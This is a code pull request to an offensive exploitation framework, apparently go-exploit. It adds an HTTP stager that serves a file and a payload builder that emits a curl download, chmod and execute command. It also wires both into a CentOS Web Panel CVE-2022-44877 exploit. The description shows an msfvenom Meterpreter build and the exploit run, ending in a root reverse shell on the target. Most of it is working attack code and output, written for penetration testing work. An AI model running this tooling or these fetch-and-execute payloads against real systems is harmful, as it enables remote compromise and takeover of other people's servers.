### PR TITLE
Implementation of HTTP server 'c2'

### DIFF
--- a/c2/factory.go
+++ b/c2/factory.go
@@ -1,13 +1,15 @@
 package c2
 
 import (
+	"github.com/vulncheck-oss/go-exploit/c2/httpservefile"
 	"github.com/vulncheck-oss/go-exploit/c2/simpleshell"
 	"github.com/vulncheck-oss/go-exploit/c2/sslshell"
 	"github.com/vulncheck-oss/go-exploit/output"
 )
 
-// A generic interface used by both reverse shells and bind shells.
+// A generic interface used by both reverse shells, bind shells, and stagers.
 type Interface interface {
+	CreateFlags()
 	Init(ipAddr string, port int, isClient bool) bool
 	Run(timeout int)
 }
@@ -18,30 +20,50 @@ const (
 	SimpleShellServer Impl = 0
 	SimpleShellClient Impl = 1
 	SSLShellServer    Impl = 2
+	HTTPServeFile     Impl = 3
 )
 
 var names = [...]string{
 	"SimpleShellServer",
 	"SimpleShellClient",
 	"SSLShellServer",
+	"HTTPServeFile",
 }
 
 // factory pattern for creating c2 interfaces. Note that this is
 // returning an interface, which is a bit anti-Go but it's more or less
 // exactly what we want so.
-func New(c2Impl Impl) (Interface, bool) {
+func GetInstance(c2Impl Impl) (Interface, bool) {
 	switch c2Impl {
 	case SimpleShellServer:
-		return new(simpleshell.Server), true
+		return simpleshell.GetServerInstance(), true
 	case SimpleShellClient:
-		return new(simpleshell.Client), true
+		return simpleshell.GetClientInstance(), true
 	case SSLShellServer:
-		return new(sslshell.Server), true
+		return sslshell.GetInstance(), true
+	case HTTPServeFile:
+		return httpservefile.GetInstance(), true
 	default:
 		output.PrintError("Invalid C2 Server")
 	}
 
 	return nil, false
+}
+
+// call into the c2 impl so that it can create command line flags.
+func CreateFlags(c2Impl Impl) {
+	switch c2Impl {
+	case SimpleShellServer:
+		simpleshell.GetServerInstance().CreateFlags()
+	case SimpleShellClient:
+		simpleshell.GetClientInstance().CreateFlags()
+	case SSLShellServer:
+		sslshell.GetInstance().CreateFlags()
+	case HTTPServeFile:
+		httpservefile.GetInstance().CreateFlags()
+	default:
+		output.PrintError("Invalid C2 Server")
+	}
 }
 
 // convert a ServerImpl enum to the string equivalent.

--- a/c2/factory_test.go
+++ b/c2/factory_test.go
@@ -1,0 +1,39 @@
+package c2
+
+import (
+	"testing"
+
+	"github.com/vulncheck-oss/go-exploit/c2/httpservefile"
+)
+
+func TestHTTPServeFileInit(t *testing.T) {
+	impl, success := GetInstance(HTTPServeFile)
+	if !success {
+		t.Fatal("Failed to create HTTPServeFile")
+	}
+
+	if len(httpservefile.GetInstance().FileName) != 0 {
+		t.Fatal("Instance has a filename already")
+	}
+
+	httpservefile.GetInstance().FileToServe = "factory.go"
+	success = impl.Init("127.0.0.1", 1270, true)
+	if success {
+		t.Fatal("Failed to check if it was invoked as a client")
+	}
+	success = impl.Init("127.0.0.1", 1270, false)
+	if !success {
+		t.Fatal("Failed to init the instance")
+	}
+
+	// random name should have been generated
+	if len(httpservefile.GetInstance().FileName) == 0 {
+		t.Fatal("Instance did not generate a random filename")
+	}
+	if httpservefile.GetInstance().HTTPAddr != "127.0.0.1" {
+		t.Fatal("Instance did not take up the http bind addr")
+	}
+	if httpservefile.GetInstance().HTTPPort != 1270 {
+		t.Fatal("Instance did not take up the http bind port")
+	}
+}

--- a/c2/httpservefile/httpservefile.go
+++ b/c2/httpservefile/httpservefile.go
@@ -1,0 +1,109 @@
+package httpservefile
+
+import (
+	"flag"
+	"fmt"
+	"net/http"
+	"os"
+	"path"
+	"time"
+
+	"github.com/vulncheck-oss/go-exploit/output"
+	"github.com/vulncheck-oss/go-exploit/random"
+)
+
+// The httpservefile Server spawns an HTTP server and hosts a single user provided file. The normal use case
+// is for an exploit to curl/wget the file and execute it. This is useful to spawn connections to other
+// tools (e.g. Metasploit, nc, etc.). This is not a traditional "c2" but serves as a useful backend that
+// logically plugs into our c2 design.
+type Server struct {
+	// The local filename to read in
+	FileToServe string
+	// A randomly generated filename to serve
+	FileName string
+	// The file data to send to the client
+	FileData []byte
+	// The HTTP address to bind to
+	HTTPAddr string
+	// The HTTP port to bind to
+	HTTPPort int
+	// Set to the Server field in HTTP response
+	ServerField string
+}
+
+var singleton *Server
+
+// A basic singleton interface for the c2.
+func GetInstance() *Server {
+	if singleton == nil {
+		singleton = new(Server)
+	}
+
+	return singleton
+}
+
+// User options for serving a file over HTTP as the "c2".
+func (httpServer *Server) CreateFlags() {
+	flag.StringVar(&httpServer.FileToServe, "httpServeFile.FileToServe", "", "The file to serve on the HTTP server")
+	flag.StringVar(&httpServer.ServerField, "httpServeFile.ServerField", "Apache", "The value to insert in the HTTP server field")
+}
+
+// load the provided file into memory. Generate the random filename.
+func (httpServer *Server) Init(rhostAddr string, rhostPort int, isClient bool) bool {
+	if isClient {
+		output.PrintError("Called C2HTTPServer as a client. Use lhost and lport.")
+
+		return false
+	}
+	httpServer.HTTPAddr = rhostAddr
+	httpServer.HTTPPort = rhostPort
+
+	if len(httpServer.FileToServe) == 0 {
+		output.PrintError("Provide an httpServeFile.FileToServe option on the command line")
+
+		return false
+	}
+
+	output.PrintfStatus("Loading the provided file: %s", httpServer.FileToServe)
+	var err error
+	httpServer.FileData, err = os.ReadFile(httpServer.FileToServe)
+	if err != nil {
+		output.PrintError(err)
+
+		return false
+	}
+
+	// the server will only respond 200 if this filename is requested
+	httpServer.FileName = random.RandLetters(12)
+
+	return true
+}
+
+// start the HTTP server and listen for incoming requests for `httpServer.FileName`.
+func (httpServer *Server) Run(timeout int) {
+	// validate the request is for the appropriate file and then send it
+	http.HandleFunc("/"+httpServer.FileName, func(writer http.ResponseWriter, r *http.Request) {
+		// set the user provided HTTP server field
+		writer.Header().Set("Server", httpServer.ServerField)
+
+		requested := path.Base(r.URL.Path)
+		output.PrintfSuccess("Received an HTTP request for %s", requested)
+		if requested == httpServer.FileName {
+			// respond with the binary
+			writer.Header().Set("Content-Type", "application/octet-stream")
+			_, _ = writer.Write(httpServer.FileData)
+		}
+	})
+
+	connectionString := fmt.Sprintf("%s:%d", httpServer.HTTPAddr, httpServer.HTTPPort)
+	output.PrintfStatus("Starting an HTTP Server on %s", connectionString)
+	go func() {
+		_ = http.ListenAndServe(connectionString, nil)
+	}()
+
+	// let the server run for timeout seconds
+	time.Sleep(time.Duration(timeout) * time.Second)
+
+	// We don't actually clean up anything, but exiting c2 will eventually terminate the program
+	output.PrintStatus("Shutting down the HTTP Server")
+}

--- a/c2/simpleshell/simpleshellclient.go
+++ b/c2/simpleshell/simpleshellclient.go
@@ -17,6 +17,19 @@ type Client struct {
 	ConnectPort int
 }
 
+var clientSingleton *Client
+
+func GetClientInstance() *Client {
+	if clientSingleton == nil {
+		clientSingleton = new(Client)
+	}
+
+	return clientSingleton
+}
+
+func (shellClient *Client) CreateFlags() {
+}
+
 func (shellClient *Client) Init(ipAddr string, port int, isClient bool) bool {
 	shellClient.ConnectAddr = ipAddr
 	shellClient.ConnectPort = port

--- a/c2/simpleshell/simpleshellserver.go
+++ b/c2/simpleshell/simpleshellserver.go
@@ -13,10 +13,31 @@ import (
 	"github.com/vulncheck-oss/go-exploit/output"
 )
 
+// The SimpleShellServer implements a basic reverse shell catcher. The server listens on a user provided
+// port and catches incoming unencrypted connections. The c2 implements a basic command line that lacks
+// any type of useful bash-like features (history, interactive behavior, displaying of stderr, etc).
+// The server can accept multiple connections, but the user has no way of swapping between them unless
+// the terminate the connection.
 type Server struct {
 	Listener net.Listener
 }
 
+var serverSingleton *Server
+
+// A basic singleton interface for the c2.
+func GetServerInstance() *Server {
+	if serverSingleton == nil {
+		serverSingleton = new(Server)
+	}
+
+	return serverSingleton
+}
+
+// User options for the simple shell server (currently empty).
+func (shellServer *Server) CreateFlags() {
+}
+
+// Validate configuration and create the listening socket.
 func (shellServer *Server) Init(ipAddr string, port int, isClient bool) bool {
 	if isClient {
 		output.PrintError("Called SimpleShellServer as a client. Use lhost and lport.")
@@ -37,6 +58,7 @@ func (shellServer *Server) Init(ipAddr string, port int, isClient bool) bool {
 	return true
 }
 
+// Listen for incoming.
 func (shellServer *Server) Run(timeout int) {
 	// mutex for user input
 	var cliLock sync.Mutex

--- a/c2/sslshell/sslshellserver.go
+++ b/c2/sslshell/sslshellserver.go
@@ -24,6 +24,19 @@ type Server struct {
 	Listener net.Listener
 }
 
+var singleton *Server
+
+func GetInstance() *Server {
+	if singleton == nil {
+		singleton = new(Server)
+	}
+
+	return singleton
+}
+
+func (shellServer *Server) CreateFlags() {
+}
+
 func (shellServer *Server) Init(ipAddr string, port int, isClient bool) bool {
 	if isClient {
 		output.PrintError("Called SSLShellServer as a client. Use lhost and lport.")

--- a/cli/commandline.go
+++ b/cli/commandline.go
@@ -102,6 +102,12 @@ func CodeExecutionCmdLineParse(conf *config.Config) bool {
 		if ok {
 			c2Available += "\n\t" + c2Name
 		}
+
+		// add the supported c2 flags, allowing for command line config of the backend
+		impl, success := c2.GetInstance(value)
+		if success {
+			impl.CreateFlags()
+		}
 	}
 	c2Available += "\n"
 	flag.StringVar(&c2Selection, "c2", c2Default, c2Available)

--- a/examples/cve-2022-44877/cve-2022-44877.go
+++ b/examples/cve-2022-44877/cve-2022-44877.go
@@ -13,6 +13,8 @@ import (
 	"github.com/vulncheck-oss/go-exploit/payload"
 	"github.com/vulncheck-oss/go-exploit/protocol"
 	"github.com/vulncheck-oss/go-exploit/random"
+
+	"github.com/vulncheck-oss/go-exploit/c2/httpservefile"
 )
 
 type CWPInjection struct{}
@@ -106,6 +108,10 @@ func generatePayload(conf *config.Config) (string, bool) {
 	case c2.SimpleShellClient:
 		output.PrintfStatus("Sending a bind shell for port %d", conf.Bport)
 		generated = payload.BindShellMkfifoNetcat(conf.Bport)
+	case c2.HTTPServeFile:
+		filename := httpservefile.GetInstance().FileName
+		output.PrintfStatus("Sending an HTTP download payload to http://%s:%d/%s", conf.Lhost, conf.Lport, filename)
+		generated = payload.LinuxCurlHTTPDownloadAndExecute(conf.Lhost, conf.Lport, filename)
 	default:
 		output.PrintError("Invalid payload")
 
@@ -153,6 +159,7 @@ func main() {
 		c2.SSLShellServer,
 		c2.SimpleShellServer,
 		c2.SimpleShellClient,
+		c2.HTTPServeFile,
 	}
 	conf := config.New(config.CodeExecution, supportedC2, "CentOS Web Panel", "CVE-2022-44877", 2031)
 	sploit := CWPInjection{}

--- a/examples/cve-2022-44877/go.mod
+++ b/examples/cve-2022-44877/go.mod
@@ -1,5 +1,0 @@
-module github.com/vulncheck-oss/go-exploit/examples/cve-2022-44877
-
-go 1.19
-
-require github.com/vulncheck-oss/go-exploit v1.0.0

--- a/examples/cve-2022-44877/go.sum
+++ b/examples/cve-2022-44877/go.sum
@@ -1,2 +1,0 @@
-github.com/vulncheck-oss/go-exploit v1.0.0 h1:s0D4kZdoqyRqImipmiIyt2/RvjEshjUYBbignxusiVM=
-github.com/vulncheck-oss/go-exploit v1.0.0/go.mod h1:06wzJcEBHDnBNrF3osLLP0zAB3kNctqJXNvAapzMn54=

--- a/framework.go
+++ b/framework.go
@@ -71,7 +71,7 @@ func doExploit(sploit Exploit, conf *config.Config) bool {
 			sploit.RunExploit(conf)
 		} else {
 			// create the requested C2 server
-			c2Impl, ok := c2.New(conf.C2Type)
+			c2Impl, ok := c2.GetInstance(conf.C2Type)
 			if !ok {
 				return false
 			}

--- a/payload/download.go
+++ b/payload/download.go
@@ -1,0 +1,13 @@
+package payload
+
+import (
+	"fmt"
+
+	"github.com/vulncheck-oss/go-exploit/random"
+)
+
+func LinuxCurlHTTPDownloadAndExecute(lhost string, lport int, downloadFile string) string {
+	output := "/tmp/" + random.RandLetters(3)
+
+	return fmt.Sprintf("curl -s -o %s http://%s:%d/%s; chmod +x %s; %s; rm %s;", output, lhost, lport, downloadFile, output, output, output)
+}

--- a/payload/download_test.go
+++ b/payload/download_test.go
@@ -1,0 +1,28 @@
+package payload
+
+import (
+	"strings"
+	"testing"
+)
+
+func TestLinuxCurlHTTPDownloadAndExecute(t *testing.T) {
+	curlCommand := LinuxCurlHTTPDownloadAndExecute("127.0.0.1", 1270, "helloworld")
+
+	if !strings.HasPrefix(curlCommand, "curl -s -o") {
+		t.Fatal(curlCommand)
+	}
+
+	if !strings.Contains(curlCommand, "http://") {
+		t.Fatal(curlCommand)
+	}
+
+	if !strings.Contains(curlCommand, "chmod +x") {
+		t.Fatal(curlCommand)
+	}
+
+	if !strings.Contains(curlCommand, "rm ") {
+		t.Fatal(curlCommand)
+	}
+
+	t.Log(curlCommand)
+}


### PR DESCRIPTION
This change introduces a new "HTTPServeFile" c2. The purpose of this "c2" isn't actually to be a command and control. Instead, it serves a generic file over HTTP. This allows go-exploit exploits to be easily integrated with other frameworks.

For example, let's say I wanted to exploit CVE-2022-44877 to drop Meterpeter. First step is to generate a meterpeter payload:

```sh
./msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=10.9.49.186 lport=1270 -f elf -o /tmp/meterpreter_rs
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
Saved as: /tmp/meterpreter_rs
```

Then I can use our example CVE-2022-44877 exploit to exploit the target and trigger download/execution of the binary:

```sh
albinolobster@mournland:~/go-exploit/examples/cve-2022-44877$ ./cve-2022-44877 -rhost 10.9.49.214 -lhost 10.9.49.186 -lport 1271 -e -c -s -c2 HTTPServeFile -httpServeFile.FileToServe /tmp/meterpreter_rs
[*] Running a version check on the remote target
[-] broken.jpg has been modified since April 3, 2022. This instance *might* be vulnerable.
[*] The target *might* be a vulnerable version. Continuing.
[*] Loading the provided file: /tmp/meterpreter_rs
[*] Starting an HTTP Server on 10.9.49.186:1271
[*] Sending an HTTP download payload to http://10.9.49.186:1271/IMyeysGKOGdG
[+] Sending exploit to https://10.9.49.214:2031/login/index.php
[+] Received an HTTP request for IMyeysGKOGdG
[*] Shutting down the HTTP Server
```

Note that the above command line options specific to httpservefile are fairly minimal. Just:

```sh
-c2 HTTPServeFile -httpServeFile.FileToServe /tmp/meterpreter_rs
```

When the go-exploit is executed, the result is that a new session is started in Metasploit:

```sh
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.9.49.186
lhost => 10.9.49.186
msf6 exploit(multi/handler) > set lport 1270
lport => 1270
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.9.49.186:1270 
[*] Sending stage (3045348 bytes) to 10.9.49.214
[*] Meterpreter session 1 opened (10.9.49.186:1270 -> 10.9.49.214:35860) at 2023-06-25 05:49:20 -0400

meterpreter > shell
Process 18123 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_service_t:s0
```

This is obviously useful when we want to use a go-exploit exploit with a mature c2/framework.

The "big" changes in this diff were basically to facilitate individual c2 defining command line options, as well as allowing exploits to directly interact / manipulate c2 (see how httpservefile is used by the example exploit). I decided on using a singleton for c2 as that made it easier to make that all happen.

This is a fairly important change in that it allows for more complicated c2 to be developed. For example, an obvious next step is to allow users to provide their own SSL certs to the SSL c2.